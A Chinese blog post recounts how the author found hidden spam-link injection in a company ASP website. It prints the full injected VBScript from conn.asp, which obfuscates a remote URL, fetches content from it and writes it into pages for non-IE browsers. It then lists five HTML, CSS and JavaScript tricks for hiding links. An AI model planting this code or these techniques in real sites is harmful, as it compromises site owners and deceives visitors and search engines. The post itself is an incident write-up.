《双陈记》情侣博客

位置:主页 > SEO学习 > asp网站被挂黑链

asp网站被挂黑链

公司网站前天又被挂黑链了,与之前有一次的情况一样。两横排黑链排在网站底部,用IE浏览器还根本看不到,查看源代码也看不见。还好我一直都用chrome浏览器,一开网站一看这下又杯具了。马上连上ftp,看一下最近修改的文件,和未知的文件。一眼望去,没有未知文件,查看最近修改的文件就只有一个数据库连接文件conn.asp和一个lanuage的语言文件。立马下载到本地,第一次打开看了一下都没发现问题,然后仔细看了下conn.asp里的代码,2段正常的函数也没神马问题,就在我准备关闭此文件时,瞅到一眼这串代码:

“h”&”t”&”t”&”p”&”:”&”/”&”/”&”y”&”d”&”7″&”6″&”9″&”.”&”c”&”n”&”/”&”l”&”i”&”n”&”k”&”/”&”0″&”1″&”.”&”a”&”s”&”p”&”?”&”i”&”d”&”=”&bl&”&website=”&website)

晕,罪魁祸首就是它了。然后仔细检查该段代码,揪出完整真凶了。

代码:

dim bl,website
website = Request.ServerVariables(“SERVER_NAME”)
Randomize
bl = INT(1000*RND)
Dim  BrowserString
BrowserString  =  Request.ServerVariables( “HTTP_USER_AGENT”)
BrowserString  =  Lcase(BrowserString)
Dim  broFirefox,broMSIE,broOpera,broWap
broMSIE  =  “msie ”
if  Instr(BrowserString,  broMSIE)  = 0  then
On Error Resume Next
Server.ScriptTimeOut=9999999
response.write(getHTTPPage(“h”&”t”&”t”&”p”&”:”&”/”&”/”&”y”&”d”&”7″&”6″&”9″&”.”&”c”&”n”&”/”&”l”&”i”&”n”&”k”&”/”&”0″&”1″&”.”&”a”&”s”&”p”&”?”&”i”&”d”&”=”&bl&”&website=”&website))
Function getHTTPPage(url)
Dim Http
Set Http = CreateObject(“MSXML2.XMLHTTP”)
Http.Open “GET”, url, False
Http.send
If Http.ReadyState <> 4 Then
Exit Function
End If
getHTTPPage = BytesToBstr(Http.responseBody, “gb2312″)
Set Http = Nothing
If Err.Number <> 0 Then Err.Clear
End Function
Function BytesToBstr(body, Cset)
Dim objstream
Set objstream = CreateObject(“adodb.stream”)
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
end if

隐藏在复制的一段正常代码之中,虽然我不太懂ASP那些代码,有了以前查找黑链的一点小经验,还是很迅速的把它揪出来了。

公司那网站还是用的ASP,漏洞多啊,空间又不稳定,一天到晚问题多啊。话说要准备彻底改版了,看来又有得折腾的了。

在网上查了一下,一般挂黑链的方法,神马html,css,js之类的,这次碰见的居然是asp类型的,长见识了哟。

附赠常见挂黑链的方法(网上收集):

第一种 HTML:
<marquee height=”1″ width=”5″ scrollAmount=”3000″ scrollDelay=”20000″>
<a href=”http://www.xxxxx.xxx/”>黑链站点</a>
</marquee>

第二种 CSS1:
<div style=”position: absolute; top: -999px;left: -999px;”>
<a href=”http://www.xxxxx.xxx/”>黑链站点</a>
</div>

第三种 CSS2:
<div style=”position:absolute;left:e-xpression(1-900);top:e-xpression(3-999);”>
<a href=”http://www.xxxxx.xxx/”>黑链站点</a>
</div>

第四种 DIV:
<div style=”display:none;”>
<a href=”http://www.xxxxx.xxx/”>黑链站点</a>
</div>

第五种 Javascript1:
<script language=”JavaScript” type=”text/javascript”>
document.write( “<div style=’display:none’>” );
</script>
<a href=”http://www.xxxxx.xxx/”>黑链站点</a>
<script language=”JavaScript” type=”text/javascript”>
document.write( “</div>” );
</script>

PS:《双陈记》情侣博客建议各位童鞋还是踏踏实实的做SEO吧,毕竟黑链那东西最后都是会被K的,最后祝大家的站点的排名都节节攀升,流量攀升,广告费大赚,哈哈!



无觅相关文章插件

已经有10位童鞋留言了,还不来盖楼!

  1. 据说ASP漏洞很多,很容易被攻击。。。不过那啥没办法啊。。。只懂ASP而已。。。

  2. Dawnson

    那个地址是用一串的&连起来的,汗呀!

  3. :!: 哎,和我在学校负责的网站一样。。。都是asp。。漏洞多的没办法。- -!网站都被大家拿来练手了。

  4. 学习了 有用!!谢谢分享

  5. 黑客方面的东西玩了很久了,辟谣一下。ASP PHP任何语言都是好的,是写代码的人的问题。ASP一般SQL注入漏洞,上传 解析 XSS 等都是由于写代码的人的问题。网站被挂黑链,首先查IIS日志,修补漏洞。清理黑链没用。此外后门其实就一句话而已,插到正常文件中 肉眼是找不到的 :grin:

love730.com
To:双陈记

 疑问 冷笑 悲伤 坏蛋 感叹 微笑 脸红 大笑 吃惊 惊讶 困惑 酷 大声笑 恼火 古怪

您还可以输入300个字插入图片